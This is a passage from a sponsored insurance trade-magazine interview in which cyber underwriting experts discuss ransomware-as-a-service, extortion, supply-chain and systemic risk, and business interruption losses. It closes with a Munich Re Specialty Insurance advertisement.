Paul Needle: Ransomware is still very much in the growth stage, with the ransomware supply chain developing in maturity much like any other product life cycle. When ransomware first became an issue, the malware was executed from beginning to end by one variant. Now there is increasing diversification of expertise throughout the ransomware process. There are specialized developers that create and sell the malware. Others sell services providing the initial access to an organization. Credentials to escalate privileges can be purchased in coordination with executing a ransomware attack. Some organizations manage a whole group of services representing a syndicate of threat actors. Entire ransomware kits, also known as ransomware as a service [RaaS], are available for purchase. The specialization in each service has quickly increased expertise and success rates. We can expect further development of these specialized skills and offerings available to threat actors looking to conduct ransomware attacks. Another recent focus has been on data exfiltration. This draws a lot less attention from the US government but can be equally devastating, depending on the data that's been stolen. There is no shortage of creativity when extorting a company. Companies need to focus on increasing cyber maturity and building a Defense in Depth model. Many insurance carriers provide services that companies can utilize in defending against active tactics, techniques and procedures.

Chart: High demand for post-incident services. Which of these services should be covered by cyber insurance solutions in case of cyberattacks? (share of respondents, C-level executives versus all business leaders): Restoration of data from backups; 24-hour help hotline; Forensic services after an incident; Legal advice; Consulting in case of extortion; Restoration of reputation. Source: Munich Re Global Cyber Risk and Insurance Survey, 2021

What other risks are causing concerns for cyber underwriters?

Paul Needle: Accumulation and systemic risk are concerns for cyber liability underwriters. Underwriters are allocating resources to investigate and identify critical relationships within organizations and technologies. Specifically, these underwriters are focusing on identifying the potential impact of cascading failures within various supply chains and single points of failure. Companies are looking to address the risk of a widespread attack, such as a supply chain attack that would affect multiple insureds at once. Insurance carriers have made valuable progress in identifying this risk, along with the help of insurtechs.

Laurie Schwarz: Underwriters are experiencing a gap between perception and reality when it comes to business interruption losses. Business interruption losses have been growing and now represent a significant amount of cyber loss costs incurred by insurers, whether the business interruption loss was sustained from ransomware or expanded coverage triggers in a soft market – e.g. human error or system failure, whether by the insured or a third-party information technology vendor the insured relies upon. Prior to the explosion of ransomware losses, insurers effectively asked if the insured had a business continuity/disaster recovery plan. Is it in writing? Does it address cyber? What are the insured's recovery time objectives? This is a start, but it provides no real insight about what a cyber business interruption loss will look like in terms of cost and the drivers of the loss, be it loss of gross profit and/or the expense incurred for data restoration. Now insurers are digging into backup and recovery processes. How are the backups isolated and protected? Insurers are asking better questions; however, they are now experiencing cyber business interruption losses and seeing how the recovery and restoration can take days or weeks, not hours as anticipated. Insurers have paid significant losses even when, on paper, the insured seems to have best-in-class processes/controls. Looking forward, it's reasonable to anticipate insurers digging deeper, learning from their prior losses. Underwriters will seek to have a multidimensional conversation with their insureds to gain a more detailed understanding of the insured's IT environment – e.g. type and number of IT assets, where and who is responsible for these assets, and how that impacts their return to being fully operational.

Annamaria Landaverde: While ransomware continues to be the hot topic for the cybersecurity and cyber insurance markets, as Laurie mentioned, 2021 saw several other significant cyberattacks with potential for widespread economic impact, such as SolarWinds, Accellion, Colonial Pipeline, JBS and Kaseya. Underwriters, as well as the government and cybersecurity sectors, are concerned about these incidents for various reasons. Concerns range from supply chain risk to the systemic impact from a cloud or cloud-based software virus/outage to the economic loss stemming from a failure of critical infrastructure. Not only can these risks result in widespread financial loss, there is also potential for loss to life or property. As technology becomes more interconnected and businesses continue to expand their supply chain reliance, the risks become more systemic in nature and less controllable from an underwriting perspective. Since cyber underwriters must focus on which exposures are measurable and insurable, to address these risks, they will be and have been enhancing guidelines, risk qualification requirements, and policy wording. This progress can result in a more mature and sustainable cyber insurance market for the long term.



Brought to you by an award-winning publishing company. Find out more about us at www.keymedia.com. Sydney | Auckland | Denver | London | Manila | Singapore | Toronto


Specialty solutions from a partner that has your back Munich Re brings together the strength and expertise of a global leader, along with simple access to a broad array of specialty insurance solutions, all from one trusted source. Our select partners benefit from our deep knowledge, innovative approaches to managing and underwriting risk, and the backing and stability that only Munich Re can offer, leaving you to focus on what matters most. Learn more at munichreus.ly/BRC.

Munich Re Specialty Insurance is a description for the insurance business operations of affiliated companies in the Munich Re Group that share a common directive to offer and deliver specialty property and casualty insurance products and services in North America. Products and services are underwritten and provided by American Alternative Insurance Corporation and The Princeton Excess and Surplus Lines Insurance Company (PESLIC).

Munich Re Specialty Insurance


